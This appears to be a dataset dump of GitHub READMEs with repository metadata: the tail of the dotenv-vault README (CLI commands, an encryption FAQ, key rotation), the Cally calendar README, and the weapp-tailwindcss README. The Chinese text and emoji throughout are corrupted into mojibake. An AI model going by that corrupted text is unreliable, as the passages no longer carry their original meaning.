manage and generate `.env.vault` files. <a href="https://www.dotenv.org/docs/tutorials/environments?r=1">Learn more about environments</a> ## ๐Ÿ“š Examples <table> <tbody> <tr> <td align="left" valign="middle"> <a href="https://www.dotenv.org/docs/platforms/vercel"> <img src="https://api.iconify.design/devicon/vercel.svg" alt="Vercel", width="20" /> Vercel </a> </td> <td align="left" valign="middle"> <a href="https://www.dotenv.org/docs/platforms/heroku"> <img src="https://api.iconify.design/skill-icons/heroku.svg" alt="Heroku", width="20" /> Heroku </a> </td> <td align="left" valign="middle"> <a href="https://www.dotenv.org/docs/cis/github-actions"> <img src="https://api.iconify.design/devicon/github.svg" alt="GitHub", width="20" /> GitHub Actions </a> </td> <td align="left" valign="middle"> <a href="https://www.dotenv.org/docs/languages/nodejs/gitlab-ci"> <img src="https://api.iconify.design/devicon/gitlab.svg" alt="GitLab", width="20" /> GitLab CI/CD </a> </td> </tr> <tr> <td align="left" valign="middle"> <a href="https://www.dotenv.org/docs/platforms/netlify"> <img src="https://api.iconify.design/skill-icons/netlify-light.svg" alt="Netlify", width="20" /> Netlify </a> </td> <td align="left" valign="middle"> <a href="https://www.dotenv.org/docs/platforms/docker"> <img src="https://api.iconify.design/skill-icons/docker.svg" alt="Docker", width="20" /> Docker </a> </td> <td align="left" valign="middle"> <a href="https://www.dotenv.org/docs/frameworks/express/docker-compose"> <img src="https://api.iconify.design/skill-icons/docker.svg" alt="Docker Compose", width="20" /> Docker Compose </a> </td> <td align="left" valign="middle"> <a href="https://www.dotenv.org/docs/cis/circleci"> <img src="https://api.iconify.design/logos/circleci.svg" alt="CircleCI", width="20" /> CircleCI </a> </td> </tr> <tr> <td align="left" valign="middle"> <a href="https://www.dotenv.org/docs/frameworks/serverless/aws-lambda"> <img src="https://api.iconify.design/logos/serverless.svg" alt="Serverless", width="20" /> Serverless </a> </td> <td align="left" valign="middle"> <a href="https://www.dotenv.org/docs/languages/nodejs/railway"> <img src="https://api.iconify.design/simple-icons/railway.svg" alt="Railway", width="20" /> Railway </a> </td> <td align="left" valign="middle"> <a href="https://www.dotenv.org/docs/languages/nodejs/render"> <img src="https://api.iconify.design/simple-icons/render.svg" alt="Render", width="20" /> Render </a> </td> <td align="left" valign="middle"> <a href="https://www.dotenv.org/docs/languages/nodejs/travis-ci"> <img src="https://api.iconify.design/simple-icons/travisci.svg" alt="Travis CI", width="20" /> Travis CI </a> </td> </tr> <tr> <td align="left" valign="middle"> <a href="https://www.dotenv.org/docs/cis/google-cloud-build"> <img src="https://api.iconify.design/devicon/googlecloud.svg" alt="Google Cloud", width="20" /> Google Cloud </a> </td> <td align="left" valign="middle"> <a href="https://www.dotenv.org/docs/platforms/fly"> <img src="https://api.iconify.design/logos/fly-icon.svg" alt="Fly.io", width="20" /> Fly.io </a> </td> <td align="left" valign="middle"> <a href="https://www.dotenv.org/docs/addons/slack"> <img src="https://api.iconify.design/devicon/slack.svg" alt="dotenv-vault + Slack", width="20" /> Slack </a> </td> <td align="left" valign="middle"> <a href="https://www.dotenv.org/docs/languages/nodejs/buddy"> <img src="https://api.iconify.design/logos/buddy.svg" alt="Buddy", width="20" /> Buddy </a> </td> </tr> <tr> <td align="left" valign="middle"> <a href="https://www.dotenv.org/docs/languages/nodejs/cloud66"> <img src="https://api.iconify.design/simple-icons/cloud66.svg" alt="Cloud66", width="20" /> Cloud66 </a> </td> <td align="left" valign="middle"> <a href="https://www.dotenv.org/docs/languages/nodejs/digital-ocean"> <img src="https://api.iconify.design/devicon/digitalocean.svg" alt="Digital Ocean", width="20" /> Digital Ocean </a> </td> <td align="left" valign="middle"> <a href="https://www.dotenv.org/docs/languages/nodejs/dagger"> <img src="https://dagger.io/img/logo-alt-2.svg" alt="Dagger", width="20" /> Dagger </a> </td> <td align="left" valign="middle"> <a href="https://www.dotenv.org/docs/languages/nodejs/bitbucket"> <img src="https://api.iconify.design/devicon/bitbucket.svg" alt="Bitbucket", width="20" /> Bitbucket </a> </td> </tr> <tr> <td align="left" valign="middle"> <a href="https://www.dotenv.org/docs/languages/nodejs"> <img src="https://api.iconify.design/devicon/nodejs.svg" alt="Node.js", width="20" /> Node.js </a> </td> <td align="left" valign="middle"> <a href="https://www.dotenv.org/docs/frameworks/express"> <img src="https://api.iconify.design/devicon/express.svg" alt="Express", width="20" /> Express </a> </td> <td align="left" valign="middle"> <a href="https://www.dotenv.org/docs/frameworks/nextjs"> <img src="https://api.iconify.design/devicon/nextjs.svg" alt="NextJS", width="20" /> NextJS </a> </td> </tr> <tr> <td align="left" valign="middle"> <a href="https://www.dotenv.org/docs/frameworks/remix"> <img src="https://api.iconify.design/skill-icons/remix-dark.svg" alt="Remix", width="20" /> Remix </a> </td> <td align="left" valign="middle"> <a href="https://www.dotenv.org/docs/frameworks/astro/netlify"> <img src="https://api.iconify.design/devicon/astro.svg" alt="Astro", width="20" /> Astro </a> </td> <td align="left" valign="middle"> <a href="https://www.dotenv.org/docs/frameworks/rails"> <img src="https://api.iconify.design/logos/rails.svg" alt="Rails", width="20" /> Rails </a> </td> <td align="left" valign="middle"> <a href="https://www.dotenv.org/docs/languages/ruby"> <img src="https://api.iconify.design/logos/ruby.svg" alt="Ruby", width="20" /> Ruby </a> </td> </tr> <tr> <td align="left" valign="middle"> <a href="https://www.dotenv.org/docs/frameworks/sinatra/heroku"> <img src="https://api.iconify.design/logos/sinatra.svg" alt="Sinatra", width="20" /> Sinatra </a> </td> <td align="left" valign="middle"> <a href="https://www.dotenv.org/docs/frameworks/flask/heroku"> <img src="https://api.iconify.design/devicon/flask.svg" alt="Flask", width="20" /> Flask </a> </td> <td align="left" valign="middle"> <a href="https://www.dotenv.org/docs/languages/python"> <img src="https://api.iconify.design/devicon/python.svg" alt="Python", width="20" /> Python </a> </td> <td align="left" valign="middle"> <a href="https://www.dotenv.org/docs/integrations/supabase/nodejs?r=1"> <img src="https://api.iconify.design/devicon/supabase.svg" alt="Supabase", width="20" /> Supabase </a> </td> </tr> <tr> <td align="left" valign="middle"> <a href="https://www.dotenv.org/docs/languages/nodejs/pulumi"> <img src="https://api.iconify.design/vscode-icons/file-type-pulumi.svg" alt="Pulumi", width="20" /> Pulumi </a> </td> <td align="left" valign="middle"> <a href="https://www.dotenv.org/docs/frameworks/angular/vercel"> <img src="https://api.iconify.design/devicon/angular.svg" alt="Angular", width="20" /> Angular </a> </td> <td align="left" valign="middle"> <a href="https://www.dotenv.org/docs/frameworks/nuxtjs"> <img src="https://api.iconify.design/logos/nuxt-icon.svg" alt="Nuxt", width="20" /> Nuxt </a> </td> <td align="left" valign="middle"> <a href="https://www.dotenv.org/docs/frameworks/vite/vercel"> <img src="https://api.iconify.design/devicon/vite.svg" alt="Vite", width="20" /> Vite </a> </td> </tr> </tbody> </table> <a href="https://www.dotenv.org/docs/">See more integration guides</a> ## ๐Ÿ“– Commands ``` $ npx dotenv-vault@latest help ``` * [new](#new) * [login](#login) * [logout](#logout) * [push](#push) * [pull](#pull) * [open](#open) * [whoami](#whoami) * [build](#build) * [keys](#keys) * [rotatekey](#rotatekey) * [decrypt](#decrypt) * [versions](#versions) * [local](#local-build) * [local build](#local-build) * [local decrypt](#local-decrypt) * [local keys](#local-keys) ### `new` Create your project at Dotenv Vault. Example: ```bash $ npx dotenv-vault@latest new ``` ##### ARGUMENTS *[DOTENV_VAULT]* Set .env.vault identifier. Defaults to generated value. ``` $ npx dotenv-vault@latest new vlt_6beaae5โ€ฆ local: Adding .env.vault (DOTENV_VAULT)... done local: Added to .env.vault (DOTENV_VAULT=vlt_6beaa...) ``` ##### FLAGS *-y, --yes* Automatic yes to prompts. Assume yes to all prompts and run non-interactively. --- ### `login` Log in to dotenv-vault. Example: ```bash $ npx dotenv-vault@latest login ``` ##### ARGUMENTS *[DOTENV_ME]* Set .env.me identifier. Defaults to generated value. ``` $ npx dotenv-vault@latest login me_00c7faโ€ฆ ``` ##### FLAGS *-y, --yes* Automatic yes to prompts. Assume yes to all prompts and run non-interactively. ``` $ npx dotenv-vault@latest login -y ``` --- ### `logout` Log out of dotenv-vault. Example: ```bash $ npx dotenv-vault@latest logout ``` ##### FLAGS *-y, --yes* Automatic yes to prompts. Assume yes to all prompts and run non-interactively. ``` $ npx dotenv-vault@latest logout -y ``` --- ### `push` Push `.env` securely. Example: ```bash $ npx dotenv-vault@latest push ``` ##### ARGUMENTS *[ENVIRONMENT]* Set environment to push to. Defaults to development ``` $ npx dotenv-vault@latest push production ``` *[FILENAME]* Set input filename. Defaults to .env for development and .env.{environment} for other environments ``` $ npx dotenv-vault@latest push production .env.production ``` ##### FLAGS *-m, --dotenvMe* Pass .env.me (DOTENV_ME) credential directly (rather than reading from .env.me file) ``` $ npx dotenv-vault@latest push --dotenvMe=me_b1831eโ€ฆ ``` *-y, --yes* Automatic yes to prompts. Assume yes to all prompts and run non-interactively. ``` $ npx dotenv-vault@latest push -y ``` --- ### `pull` Pull `.env` securely. Example: ```bash $ npx dotenv-vault@latest pull ``` ##### ARGUMENTS *[ENVIRONMENT]* Set environment to pull from. Defaults to development ``` $ npx dotenv-vault@latest pull production ``` *[FILENAME]* Set output filename. Defaults to .env for development and .env.{environment} for other environments ``` $ npx dotenv-vault@latest pull production .env.production ``` ##### FLAGS *-m, --dotenvMe* Pass .env.me (DOTENV_ME) credential directly (rather than reading from .env.me file) ``` $ npx dotenv-vault@latest pull --dotenvMe=me_b1831eโ€ฆ ``` *-y, --yes* Automatic yes to prompts. Assume yes to all prompts and run non-interactively. ``` $ npx dotenv-vault@latest pull -y ``` If you want to pull a specific version you can do so. For example, ``` npx dotenv-vault@latest pull development@v14 ``` --- ### `open` Open project page. Example: ```bash $ npx dotenv-vault@latest open ``` ##### ARGUMENTS *[ENVIRONMENT]* Set environment to open to. Defaults to development. ``` $ npx dotenv-vault@latest open production ``` ##### FLAGS *-y, --yes* Automatic yes to prompts. Assume yes to all prompts and run non-interactively. ``` $ npx dotenv-vault@latest open -y ``` --- ### `whoami` Display the current logged in user. Example: ```bash $ npx dotenv-vault@latest whoami ``` ##### FLAGS *-m, --dotenvMe* Pass .env.me (DOTENV_ME) credential directly (rather than reading from .env.me file) ``` $ npx dotenv-vault@latest whoami dotenvMe=me_b1831eโ€ฆ ``` --- ### `build` Build .env.vault file. Example: ```bash $ npx dotenv-vault@latest build ``` ##### FLAGS *-m, --dotenvMe* Pass .env.me (DOTENV_ME) credential directly (rather than reading from .env.me file) ``` $ npx dotenv-vault@latest build dotenvMe=me_b1831eโ€ฆ ``` *-y, --yes* Automatic yes to prompts. Assume yes to all prompts and run non-interactively. ``` $ npx dotenv-vault@latest build -y ``` --- ### `keys` List .env.vault decryption keys. Example: ```bash $ npx dotenv-vault@latest keys ``` ##### ARGUMENTS *[ENVIRONMENT]* Set environment. Defaults to all. ``` $ npx dotenv-vault@latest keys productionโ€ฆ remote: Listing .env.vault decryption keys... done dotenv://:key_899..@dotenv.org/vault/.env.vault?environment=production ``` ##### FLAGS *-m, --dotenvMe* Pass .env.me (DOTENV_ME) credential directly (rather than reading from .env.me file) ``` $ npx dotenv-vault@latest keys dotenvMe=me_b1831eโ€ฆ ``` *-y, --yes* Automatic yes to prompts. Assume yes to all prompts and run non-interactively. ``` $ npx dotenv-vault@latest keys -y ``` --- ### `rotatekey` Rotate DOTENV_KEY. Example: ```bash $ npx dotenv-vault@latest rotatekey production ``` ##### FLAGS *-m, --dotenvMe* Pass .env.me (DOTENV_ME) credential directly (rather than reading from .env.me file) ``` $ npx dotenv-vault@latest rotatekey dotenvMe=me_b1831eโ€ฆ ``` *-y, --yes* Automatic yes to prompts. Assume yes to all prompts and run non-interactively. ``` $ npx dotenv-vault@latest rotatekey -y ``` --- ### `decrypt` Decrypt .env.vault locally. Example: ```bash $ npx dotenv-vault@latest decrypt dotenv://:key_1234@dotenv.org/vault/.env.vault?environment=development ``` ##### ARGUMENTS *[DOTENV_KEY]* Set `DOTENV_KEY` to decrypt .env.vault. Development key will decrypt development, production will decrypt production, and so on. ``` $ npx dotenv-vault@latest decrypt dotenv://:key_1234@dotenv.org/vault/.env.vault?environment=development ``` --- ### `versions` List version history. Example: ```bash $ npx dotenv-vault@latest versions ``` ##### ARGUMENTS *[ENVIRONMENT]* Set environment to check versions against. Defaults to development. ``` $ npx dotenv-vault@latest versions production ``` ##### FLAGS *-m, --dotenvMe* Pass .env.me (DOTENV_ME) credential directly (rather than reading from .env.me file) ``` $ npx dotenv-vault@latest versions dotenvMe=me_b1831eโ€ฆ ``` *-y, --yes* Automatic yes to prompts. Assume yes to all prompts and run non-interactively. ``` $ npx dotenv-vault@latest versions -y ``` If you want to pull a specific version you can do so. For example, ``` npx dotenv-vault@latest pull development@v14 ``` --- ### `local build` Build .env.vault from local only Example: ```bash $ npx dotenv-vault@latest local build ``` This will encrypt the contents of your `.env` file and any `.env.ENVIRONMENT` files you have locally into your `.env.vault` file. ### `local decrypt` Decrypt .env.vault from local only Example: ```bash $ npx dotenv-vault@latest local decrypt dotenv://:key_1234@dotenv.local/vault/.env.vault?environment=development ``` ##### ARGUMENTS *[DOTENV_KEY]* Set `DOTENV_KEY` to decrypt .env.vault. Development key will decrypt development, production will decrypt production, and so on. ``` $ npx dotenv-vault@latest local decrypt dotenv://:key_1234@dotenv.local/vault/.env.vault?environment=development ``` ### `local keys` List .env.vault local decryption keys from .env.keys file Example: ```bash $ npx dotenv-vault@latest local keys local: Listing .env.vault decryption keys from .env.keys... done environment DOTENV_KEY โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€ โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€ develompent dotenv://:key_33ee..@dotenv.local/vault/.env.vaโ€ฆ production dotenv://:key_7038..@dotenv.local/vault/.env.vaโ€ฆ ``` ##### ARGUMENTS *[ENVIRONMENT]* Set `ENVIRONMENT` to output a single environment's DOTENV_KEY. ``` $ npx dotenv-vault@latest local keys developmentโ€ฆ local: Listing .env.vault decryption keys from .env.keys... done dotenv://:key_a682c..@dotenv.local/vault/.env.vault?environment=development ``` ## โ“ FAQ ### Why is the `.env.vault` file not decrypting my environment variables successfully? First, make sure you are using `dotenv@16.1.0` or greater. (If you are using a different language make sure you have installed one of its [libraries](#what-languages-does-this-work-with).) Second, test decryption is working locally. ```bash $ npx dotenv-vault@latest decrypt dotenv://:key_1234..@dotenv.local/vault/.env.vault?environment=production # outputs environment variables ``` Third, test decryption on boot is working locally. ```bash $ DOTENV_KEY='dotenv://:key_1234..@dotenv.local/vault/.env.vault?environment=production' npm start # boots your app with production envs ``` ### Should I commit my `.env.vault` file? Yes. It is safe and recommended to do so. DO commit your `.env.vault` file to code. DO NOT commit your `.env` file. The `.env.vault` file contains ciphertext generated using AES-256. AES-256 is trusted by the US Government to transmit top-secret information and has a brute-force timescale of about a billion years. ### I accidentally leaked my `DOTENV_KEY`, what can I do? Does that attacker also have access to your `.env.vault` file? * No: good, the attacker cannot do any damage. They need both the `DOTENV_KEY` and `.env.vault` file to access your secrets. This extra layer of security sets the `.env.vault` file apart as a superior solution to other SecretOps solutions. * Yes: IMMEDIATELY start rotating your secrets at your third-party API providers. This scenario would be the same no matter what SecretOps solution you use. After completing the above, rotate your `DOTENV_KEY` using the [rotatekey](#rotatekey) command, rebuild your `.env.vault` file, and redeploy. ### Is it safe to store my secrets with dotenv-vault? It safer than scattering your secrets across multiple cloud providers. Those providers are focused on code deployment and server performance over secrets security.[1] Dotenv Vault's singular focus is secrets security, and as a result we go to great lengths to make sure your secrets are safe. Afterall, we keep our secrets here too.[2] * [[1] CircleCI Breach](https://techcrunch.com/2023/01/05/circleci-breach/) * [[2] Security at Dotenv Vault](https://www.dotenv.org/security) ### What languages does this work with? The `.env.vault` file and its encryption algorithm is language-agnostic so technically it works with any language. We've built convenience libraries for it in a handful of languages and are adding more quickly. * [Go](https://github.com/dotenv-org/godotenvvault) * [Kotlin](https://github.com/dotenv-org/dotenv-vault-kotlin) * [NodeJS](https://github.com/motdotla/dotenv) * [PHP](https://github.com/dotenv-org/phpdotenv-vault) * [Python](https://github.com/dotenv-org/python-dotenv-vault) * [Ruby](https://github.com/dotenv-org/dotenv-vault-ruby) ### How do I use ๐Ÿ’ป Locally Managed dotenv-vault? There are a series of **๐Ÿ’ป Locally Managed** commands available to you. Locally managed never makes a remote API call. It is completely managed on your machine. **๐Ÿ” Vault Managed** adds conveniences like backing up your .env file, secure sharing across your team, access permissions, and version history. **๐Ÿ’ป Locally Managed** is a good choice for someone who would prefer to handle this coordination themselves and does not want to trust Dotenv Vault with their secrets. <a href="https://www.youtube.com/watch?v=Ad7Wl8iC3Rs"> <div align="right"> <img src="https://img.youtube.com/vi/Ad7Wl8iC3Rs/hqdefault.jpg" alt="how to deploy with a .env.vault file video tutorial" align="right" width="330" /> <img src="https://simpleicons.vercel.app/youtube/ff0000" alt="youtube/@dotenvorg" align="right" width="24" /> </div> </a> Here's how it works. Generate your `.env.vault` file. ```shell $ npx dotenv-vault@latest local build ``` This creates two files: * `.env.vault` - encrypted contents of .env* file(s) * `.env.keys` - decryption key(s) Boot using `.env.vault`. ``` $ DOTENV_KEY=<key string from .env.keys> npm start [dotenv@16.1.0][INFO] Loading env from encrypted .env.vault ``` Great! Next, set the `DOTENV_KEY` on your server. For example in heroku: ```shell $ heroku config:set DOTENV_KEY=<key string from .env.keys> ``` Commit your `.env.vault` file safely to code and deploy. Your `.env.vault` is decrypted on boot, its environment variables injected, and your app works as expected. Congratulations, your secrets are now much safer than scattered across multiple servers and cloud providers! ## Contributing See [CONTRIBUTING.md](CONTRIBUTING.md) ## Changelog See [CHANGELOG.md](CHANGELOG.md) ## License MIT
sync .env filesโ€”from the creator of `dotenv`.
dotenv,env,secrets
1
5
171
822
38
7
1
WickyNilliams/cally
# Cally Small, feature-rich calendar components - **Small bundle size** - less than 8.5KB min/gzip - **Full feature set** - single dates, ranges, display multiple months - **HTML-friendly** - easy to author, framework-independent - **Minimal dependencies** - just one - **Accessible** - keyboard and screen reader - **Localizable** - `Intl.DateTimeFormat`, CSS logical properties, RTL support - **Themeable** - CSS parts and custom properties to offer flexibility and power - **Composable** - impose no DOM specific structure, play well with others ## Installation ```bash npm install cally ``` ## Usage ### Via module ```js import "cally"; ``` ### Via CDN ```html <script type="module" src="https://unpkg.com/cally"></script> ``` ### Using the components ```html <calendar-range months="2"> <calendar-month></calendar-month> <calendar-month offset="1"></calendar-month> </calendar-range> ``` ## Docs For full documentation, visit: https://wicky.nillia.ms/cally/ ## License MIT
Small, feature-rich calendar components
web-component,datepicker,date-picker,webcomponent,calendar,calendar-component
0
3
28
131
4
2
2
sonofmagic/weapp-tailwindcss
<p align="center"> <a href="https://weapp-tw.icebreaker.top"> <img src="./assets/logo.png" alt="weapp-tailwindcss-logo" width="128"> </a> <br> <h1 align="center">weapp-tailwindcss</h1> </p> > ็ฎ€ไฝ“ไธญๆ–‡(zh-cn) | [English](./README_en.md) ![star](https://badgen.net/github/stars/sonofmagic/weapp-tailwindcss) ![dm0](https://badgen.net/npm/dm/weapp-tailwindcss) ![dm1](https://badgen.net/npm/dm/weapp-tailwindcss-webpack-plugin) ![license](https://badgen.net/npm/license/weapp-tailwindcss) [![test](https://github.com/sonofmagic/weapp-tailwindcss/actions/workflows/test.yml/badge.svg?branch=main)](https://github.com/sonofmagic/weapp-tailwindcss/actions/workflows/test.yml) [![codecov](https://codecov.io/gh/sonofmagic/weapp-tailwindcss/branch/main/graph/badge.svg?token=zn05qXYznt)](https://codecov.io/gh/sonofmagic/weapp-tailwindcss) > [!NOTE] > ้™ไฝŽๅผ€ๅ‘็ปดๆŠคๆˆๆœฌ๏ผŒๆๅ‡ๅผ€ๅ‘ๆ•ˆ็Ž‡็š„ `ๅฐ็จ‹ๅบ` `tailwindcss` ๅ…จๆ–น้ข่งฃๅ†ณๆ–นๆกˆ > > `Tailwindcss/Unocss UI` ็”Ÿๆˆๆๅ–ๅ™จ: [`IceStack`](https://ui.icebreaker.top/zh-CN) ๅทฒ็ปๅ‘ๅธƒ๏ผŒๅฟซๆฅ็”จๅฎƒ็ฎก็†ไฝ ็š„ๅŽŸๅญๅŒ–`CSS` ็ป„ไปถๅง๏ผ \[[ๅ›ฝๅ†…้ƒจ็ฝฒ็š„ๆ–‡ๆกฃๅœฐๅ€](https://weapp-tw.icebreaker.top)\] \| \[[ๅค‡็”จGithub Page](https://sonofmagic.github.io/weapp-tailwindcss/)\] \| \[[1.xๆ–‡ๆกฃ]('./v1.md')\] - [็‰นๆ€ง](#็‰นๆ€ง) - [็‰ˆๆœฌๅฏนๅบ”](#็‰ˆๆœฌๅฏนๅบ”) - [ๅฎ‰่ฃ…ไธŽไฝฟ็”จๆ–นๅผ](#ๅฎ‰่ฃ…ไธŽไฝฟ็”จๆ–นๅผ) - [็”Ÿๆ€ๅ’Œ่งฃๅ†ณๆ–นๆกˆ](#็”Ÿๆ€ๅ’Œ่งฃๅ†ณๆ–นๆกˆ) - [ๅธธ่ง้—ฎ้ข˜](#ๅธธ่ง้—ฎ้ข˜) - [็Žฐๆˆ้…็ฝฎๅฅฝ็š„ๅ„ไธชๆก†ๆžถ็š„ๆจกๆฟ](#็Žฐๆˆ้…็ฝฎๅฅฝ็š„ๅ„ไธชๆก†ๆžถ็š„ๆจกๆฟ) - [ๆ—ง็‰ˆๆœฌ่ฟ็งปๆŒ‡ๅ—](#ๆ—ง็‰ˆๆœฌ่ฟ็งปๆŒ‡ๅ—) - [้…็ฝฎ้กนๅ‚่€ƒ](#้…็ฝฎ้กนๅ‚่€ƒ) - [ๅ˜ๆ›ดๆ—ฅๅฟ—](#ๅ˜ๆ›ดๆ—ฅๅฟ—) - [Tips](#tips) - [Contribute](#contribute) - [License](#license) - [Star History](#star-history) - [Related projects](#related-projects) - [IceStack](#icestack) - [weapp-ide-cli](#weapp-ide-cli) - [weapp-pandacss](#weapp-pandacss) ## ็‰นๆ€ง | ไธไป…ไป…ๆ˜ฏ`webpack` | ไธปๆตๆก†ๆžถไธŽๅŽŸ็”Ÿๅผ€ๅ‘ๆ”ฏๆŒ | | --------------------------------------------------- | ----------------------------------------------- | | ![wepback+vite+gulp](./assets/weapp-tw-plugins.png) | ![frameworks](./assets/weapp-tw-frameworks.png) | ๆ ธๅฟƒๆ’ไปถๆ”ฏๆŒ `webpack`/`vite`/`gulp` ไธบๅŸบๅบ•็š„ๆก†ๆžถ็ฑปๅฐ็จ‹ๅบๅผ€ๅ‘๏ผŒๆถต็›–ไบ†ๅธ‚้ขไธŠๅ‡ ไนŽๆ‰€ๆœ‰็š„ไธปๆต็š„ๅผ€ๅ‘ๆก†ๆžถใ€‚ ๅŒๆ—ถไนŸๆ”ฏๆŒๆœ€ๅŽŸ็”Ÿ็š„ๅผ€ๅ‘่€…ๅทฅๅ…ทๅˆ›ๅปบ็š„ๅŽŸ็”Ÿๅฐ็จ‹ๅบๅบ”็”จใ€‚ ่ฟ™ไบ›ๆ’ไปถ่ƒฝๅคŸ่‡ชๅŠจ่ฏ†ๅˆซๅนถ็ฒพ็กฎๅค„็†ๆ‰€ๆœ‰ `tailwindcss` ็š„ๅทฅๅ…ท็ฑปๆฅ้€‚้…ๅฐ็จ‹ๅบ็Žฏๅขƒใ€‚ ## ็‰ˆๆœฌๅฏนๅบ” ็›ฎๅ‰๏ผŒ`weapp-tailwindcss` ็š„ `2.x` ๅ’Œ `3.x` ๆ”ฏๆŒๆœ€ๆ–ฐ็‰ˆๆœฌ็š„ `tailwindcss v3.x.x` ็‰ˆๆœฌๅ’Œ `webpack5`๏ผŒ`webpack4`, `vite` ๅ’Œ `gulp`ใ€‚ไปŽ `3.2.0` ๅผ€ๅง‹๏ผŒ`weapp-tailwindcss` ๆ”ฏๆŒๆœ€ๅŽŸ็”Ÿ็š„ๅฐ็จ‹ๅบๅผ€ๅ‘ๆ–นๅผใ€‚ > ๅฆ‚ๆžœไฝ ่ฟ˜ๅœจไฝฟ็”จ `tailwindcss@2` ็‰ˆๆœฌ๏ผŒ้‚ฃไฝ ๅบ”่ฏฅไฝฟ็”จๆœฌๆ’ไปถ็š„ `1.x`/`webpack4` ็‰ˆๆœฌใ€‚ๅฆๅค–่ฏท็กฎไฟไฝ ็š„ `nodejs` ็‰ˆๆœฌ `>=16.6.0`ใ€‚็›ฎๅ‰ไฝŽไบŽ `16` ็š„้•ฟๆœŸ็ปดๆŠค็‰ˆๆœฌ(`ๅถๆ•ฐ็‰ˆๆœฌ`) ้ƒฝๅทฒ็ป็ป“ๆŸไบ†็”Ÿๅ‘ฝๅ‘จๆœŸ๏ผŒๅปบ่ฎฎๅฎ‰่ฃ… `nodejs` ็š„ `LTS`็‰ˆๆœฌ๏ผŒ่ฏฆ่ง [nodejs/release](https://github.com/nodejs/release) ## [ๅฎ‰่ฃ…ไธŽไฝฟ็”จๆ–นๅผ](https://weapp-tw.icebreaker.top/docs/quick-start/install) ## [็”Ÿๆ€ๅ’Œ่งฃๅ†ณๆ–นๆกˆ](https://weapp-tw.icebreaker.top/docs/community/templates) ## [ๅธธ่ง้—ฎ้ข˜](https://weapp-tw.icebreaker.top/docs/issues/) ## [็Žฐๆˆ้…็ฝฎๅฅฝ็š„ๅ„ไธชๆก†ๆžถ็š„ๆจกๆฟ](https://weapp-tw.icebreaker.top/docs/community/templates) ## [ๆ—ง็‰ˆๆœฌ่ฟ็งปๆŒ‡ๅ—](https://weapp-tw.icebreaker.top/docs/migrations/v2) ## [้…็ฝฎ้กนๅ‚่€ƒ](https://weapp-tw.icebreaker.top/docs/api/interfaces/UserDefinedOptions) ## [ๅ˜ๆ›ดๆ—ฅๅฟ—](./CHANGELOG.md) ## Tips ๅ‰ๆฒฟ้˜…่ฏป: [Whatโ€™s Tailwind Oxide Engine? The Next Evolution of Tailwind CSS](https://medium.com/@bomber.marek/whats-tailwind-oxide-engine-the-next-evolution-of-tailwind-css-32e7ef8e19a1) ๆœชๆฅ `tailwindcss@4` ไผšๅˆ‡ๆขๅˆฐ่ฟ™ไธชๅผ•ๆ“Žๆฅๅคงๅน…ๅŠ ๅฟซๆž„ๅปบๅ’Œ่ฟ่กŒ้€Ÿๅบฆ๏ผŒๅฝ“็„ถ็ญ‰ๅฎƒๅ‘ๅธƒๆญฃๅผ็‰ˆๆœฌ็š„ๆ—ถๅ€™๏ผŒๆˆ‘ไนŸไผšๅฐฝๅฏ่ƒฝ็ฌฌไธ€ๆ—ถ้—ดๅŽป่ฟ›่กŒๅ…ผๅฎนๆ–ฐ็š„ๅผ•ๆ“Žใ€‚ ## Contribute ๆˆ‘ไปฌ้‚€่ฏทไฝ ๆฅ่ดก็Œฎๅ’ŒๅธฎๅŠฉๆ”น่ฟ› `weapp-tailwindcss` ๐Ÿ’š๐Ÿ’š๐Ÿ’š ไปฅไธ‹ๆœ‰ๅ‡ ไธชๆ–นๅผๅฏไปฅๅ‚ไธŽ: - ๆŠฅๅ‘Š้”™่ฏฏ๏ผšๅฆ‚ๆžœๆ‚จ้‡ๅˆฐไปปไฝ•้”™่ฏฏๆˆ–้—ฎ้ข˜๏ผŒ่ฏทๆ`issue`ๅนถๆไพ›ๅฎŒๅ–„็š„้”™่ฏฏไฟกๆฏๅ’Œๅค็Žฐๆ–นๅผใ€‚ - ๅปบ่ฎฎ๏ผšๆœ‰ๅขžๅผบ `weapp-tailwindcss` ็š„ๆƒณๆณ•ๅ—๏ผŸ่ฏทๆ `issue` ๆฅๅˆ†ไบซๆ‚จ็š„ๅปบ่ฎฎใ€‚ - ๆ–‡ๆกฃ๏ผšๅฆ‚ๆžœๆ‚จๅฏนๆ–‡ๆกฃๆœ‰ๆ›ดๅฅฝ็š„่ง่งฃๆˆ–่€…ๆ›ดๆฃ’็š„ไฟฎ่พžๆ–นๅผ๏ผŒๆฌข่ฟŽ `pr`ใ€‚ - ไปฃ็ ๏ผšไปปไฝ•ไบบ็š„ไปฃ็ ้ƒฝไธๆ˜ฏๅฎŒ็พŽ็š„๏ผŒๆˆ‘ไปฌๆฌข่ฟŽไฝ ้€š่ฟ‡ `pr` ็ป™ไปฃ็ ๆไพ›ๆ›ดๅฅฝ็š„่ดจ้‡ไธŽๆดปๅŠ›ใ€‚ ## License [MIT](./LICENSE) ## Star History [![Star History Chart](https://api.star-history.com/svg?repos=sonofmagic/weapp-tailwindcss&type=Date)](https://star-history.com/#sonofmagic/weapp-tailwindcss&Date) ## Related projects ### IceStack [IceStack](https://github.com/sonofmagic/icestack): โค๏ธ IceStack, Web UI for Mobile, PC, open-source Css component library generator ### weapp-ide-cli [weapp-ide-cli](https://github.com/sonofmagic/utils/tree/main/packages/weapp-ide-cli): ไธ€ไธชๅพฎไฟกๅผ€ๅ‘่€…ๅทฅๅ…ทๅ‘ฝไปค่กŒ๏ผŒๅฟซ้€Ÿๆ–นไพฟ็š„็›ดๆŽฅๅฏๅŠจ ide ่ฟ›่กŒ็™ปๅฝ•๏ผŒๅผ€ๅ‘๏ผŒ้ข„่งˆ๏ผŒไธŠไผ ไปฃ็ 